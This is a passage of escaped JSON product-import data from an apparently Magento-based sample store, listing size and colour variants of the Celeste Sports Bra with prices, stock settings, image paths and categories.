Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1579\":{\"sku\":\"WB03-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-S-Yellow\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1580\":{\"sku\":\"WB03-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-M-Green\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb03-green_alt1.jpg,\\/w\\/b\\/wb03-green_back.jpg\",\"image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb03-green_alt1.jpg,\\/w\\/b\\/wb03-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1581\":{\"sku\":\"WB03-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-M-Red\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1582\":{\"sku\":\"WB03-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-M-Yellow\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1583\":{\"sku\":\"WB03-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-L-Green\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb03-green_alt1.jpg,\\/w\\/b\\/wb03-green_back.jpg\",\"image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb03-green_alt1.jpg,\\/w\\/b\\/wb03-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1584\":{\"sku\":\"WB03-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-L-Red\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1585\":{\"sku\":\"WB03-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-L-Yellow\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1586\":{\"sku\":\"WB03-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-XL-Green\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb03-green_alt1.jpg,\\/w\\/b\\/wb03-green_back.jpg\",\"image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb03-green_alt1.jpg,\\/w\\/b\\/wb03-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",